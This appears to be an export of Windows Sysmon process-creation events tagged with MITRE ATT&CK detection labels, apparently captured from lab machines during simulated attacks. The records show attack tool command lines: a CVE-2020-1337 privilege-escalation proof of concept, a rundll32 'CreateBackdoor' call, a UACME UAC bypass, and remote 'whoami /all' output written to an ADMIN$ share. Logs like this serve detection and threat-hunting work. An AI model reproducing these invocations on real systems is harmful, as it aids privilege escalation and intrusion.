SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-2910-5E1E-0000-001053F57C00
4448
C:\Windows\System32\cmd.exe
cmd.exe /c start ms-browser://
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5703
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-04 09:10:30.702
747F3D96-A106-5D46-0000-00102425BD03
6604
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-A106-5D46-0000-00107201BD03
1380
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
342411
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:00.734
747F3D96-E938-5F33-0000-00101CA50E00
7836
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
MSEDGEWIN10\IEUser
747F3D96-E911-5F33-0000-0020241C0400
0x41c24
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E938-5F33-0000-00109CA00E00
7820
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
WerTrigger.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
1
5
4
1
0
0x8000000000000000
344
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:16.990
747F3D96-2910-5E1E-0000-001053F57C00
4448
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /c start ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2910-5E1E-0000-002082EF7C00
0x7cef82
0
High
SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-2910-5E1E-0000-0010F5F07C00
4612
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
1
5
4
1
0
0x8000000000000000
344
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:16.990
747F3D96-2910-5E1E-0000-001053F57C00
4448
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /c start ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2910-5E1E-0000-002082EF7C00
0x7cef82
0
High
SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-2910-5E1E-0000-0010F5F07C00
4612
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"
1
5
4
1
0
0x8000000000000000
344
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:16.990
747F3D96-2910-5E1E-0000-001053F57C00
4448
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /c start ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2910-5E1E-0000-002082EF7C00
0x7cef82
0
High
SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-2910-5E1E-0000-0010F5F07C00
4612
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1,"
1
5
4
1
0
0x8000000000000000
17985
Microsoft-Windows-Sysmon/Operational
DC1.insecurebank.local
2019-05-16 01:31:36.443
DFAE8213-BD78-5CDC-0000-001091041300
3136
C:\Windows\System32\cmd.exe
6.3.9600.16384 (winblue_rtm.130821-1623)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /C ipconfig
C:\Users\administrator\
insecurebank\Administrator
DFAE8213-BD78-5CDC-0000-002005FE1200
0x12fe05
0
High
SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3
DFAE8213-BD78-5CDC-0000-0010C7FE1200
3948
C:\Windows\System32\winrshost.exe
C:\Windows\system32\WinrsHost.exe -Embedding
",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /all) ,1,"
1
5
4
1
0
0x8000000000000000
8050
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-29 20:59:22.128
365ABB72-65AA-5CC7-0000-00104D882400
2116
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /all
C:\Users\IEUser\Documents\
IEWIN7\IEUser
365ABB72-5B3A-5CC7-0000-002096080100
0x10896
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-65A9-5CC7-0000-00104E5C2400
3376
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
8050
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-29 20:59:22.128
365ABB72-65AA-5CC7-0000-00104D882400
2116
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /all
C:\Users\IEUser\Documents\
IEWIN7\IEUser
365ABB72-5B3A-5CC7-0000-002096080100
0x10896
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-65A9-5CC7-0000-00104E5C2400
3376
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
1
5
4
1
0
0x8000000000000000
423991
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:29.192
747F3D96-51C9-5F93-0000-001010175B00
8796
C:\Windows\System32\wbem\WmiPrvSE.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Provider Host
Microsoft® Windows® Operating System
Microsoft Corporation
Wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\
NT AUTHORITY\NETWORK SERVICE
747F3D96-C50A-5F93-0000-0020E4030000
0x3e4
0
System
SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
00000000-0000-0000-0000-000000000000
836
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243565
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.544
747F3D96-9F69-5E75-0000-0010729F2000
3536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243565
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.544
747F3D96-9F69-5E75-0000-0010729F2000
3536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1,"
1
5
4
1
0
0x8000000000000000
342409
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:05:38.149
747F3D96-E922-5F33-0000-00107A2B0B00
6952
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E909-5F33-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E90A-5F33-0000-0010863C0100
1740
C:\Windows\System32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat""
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1,"
1
5
4
1
0
0x8000000000000000
5134
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 09:46:49.331
747F3D96-5809-5D45-0000-00100B233F00
1380
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C:
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D4EA-5D45-0000-00105CD60000
1072
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243565
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.544
747F3D96-9F69-5E75-0000-0010729F2000
3536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /all ) ,1,"
1
5
4
1
0
0x8000000000000000
9840
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:35:13.527
365ABB72-B181-5CC8-0000-00108DC71E00
692
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami /all
C:\
IEWIN7\IEUser
365ABB72-B17F-5CC8-0000-0020C6A31E00
0x1ea3c6
0
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-B181-5CC8-0000-001023C41E00
1256
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
1
5
4
1
0
0x8000000000000000
422746
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-20 22:35:26.747
747F3D96-662E-5F8F-0000-001023353800
6748
C:\Windows\System32\wbem\WmiPrvSE.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Provider Host
Microsoft® Windows® Operating System
Microsoft Corporation
Wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\
NT AUTHORITY\NETWORK SERVICE
747F3D96-E130-5F8F-0000-0020E4030000
0x3e4
0
System
SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
00000000-0000-0000-0000-000000000000
840
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
342408
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:05:36.545
747F3D96-E920-5F33-0000-001043920A00
5128
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
MSEDGEWIN10\IEUser
747F3D96-E911-5F33-0000-0020241C0400
0x41c24
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E914-5F33-0000-001009990500
5144
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1,"
1
5
4
1
0
0x8000000000000000
5133
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence - Scheduled Task Management
2019-08-03 09:46:48.842
747F3D96-5808-5D45-0000-0010D1FE3E00
1268
C:\Windows\System32\schtasks.exe
10.0.17763.1 (WinBuild.160101.0800)
Task Scheduler Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i
C:\Users\IEUser\Desktop\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020FBD31800
0x18d3fb
1
Medium
SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
747F3D96-5808-5D45-0000-00106CDC3E00
924
C:\Users\IEUser\Desktop\UACME.exe
UACME.exe 34
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9839
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:35:13.512
365ABB72-B181-5CC8-0000-001023C41E00
1256
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
C:\
IEWIN7\IEUser
365ABB72-B17F-5CC8-0000-0020C6A31E00
0x1ea3c6
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B17F-5CC8-0000-001082A51E00
3572
C:\Windows\System32\mmc.exe
C:\Windows\system32\mmc.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"
1
5
4
1
0
0x8000000000000000
1046
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-24 01:33:53.152
365ABB72-4A01-5CE7-0000-00102DA1AC00
788
C:\Windows\System32\net.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net user
c:\windows\system32\inetsrv\
IIS APPPOOL\DefaultAppPool
365ABB72-45C7-5CE7-0000-002092F99C00
0x9cf992
0
High
SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7
365ABB72-4A01-5CE7-0000-0010EE9DAC00
2404
C:\Windows\System32\cmd.exe
"c:\windows\system32\cmd.exe" /c net user
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /all ) ,1,"
1
5
4
1
0
0x8000000000000000
9829
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.356
365ABB72-B0F3-5CC8-0000-0010373E1D00
3328
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami /all
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-B0F3-5CC8-0000-0010C43A1D00
2828
C:\Windows\System32\cmd.exe
cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"
1
5
4
1
0
0x8000000000000000
1046
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-24 01:33:53.152
365ABB72-4A01-5CE7-0000-00102DA1AC00
788
C:\Windows\System32\net.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net user
c:\windows\system32\inetsrv\
IIS APPPOOL\DefaultAppPool
365ABB72-45C7-5CE7-0000-002092F99C00
0x9cf992
0
High
SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7
365ABB72-4A01-5CE7-0000-0010EE9DAC00
2404
C:\Windows\System32\cmd.exe
"c:\windows\system32\cmd.exe" /c net user
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1,"
1
5
4
1
0
0x8000000000000000
549016
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-12-04 22:41:04.465
747F3D96-BB00-5FCA-0000-001033CD7600
8536
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry
C:\Windows\system32\
NT AUTHORITY\LOCAL SERVICE
747F3D96-3407-5FCB-0000-0020E5030000
0x3e5
0
System
